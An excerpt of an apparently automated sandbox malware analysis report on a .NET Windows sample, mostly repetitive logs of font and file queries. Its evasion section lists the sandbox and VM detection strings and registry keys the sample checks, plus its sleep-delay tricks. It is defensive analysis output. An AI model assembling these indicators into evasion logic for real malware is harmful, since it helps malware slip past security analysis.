                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM_3Show sources
                    Source: Yara matchFile source: 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeWindow / User API: threadDelayed 2200Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 7164Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 3512Thread sleep count: 2200 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 3512Thread sleep count: 82 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 7112Thread sleep time: -41500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 1744Thread sleep count: 65 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 1744Thread sleep time: -3900000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeBinary or memory string: Qemu)
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}Jump to behavior
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
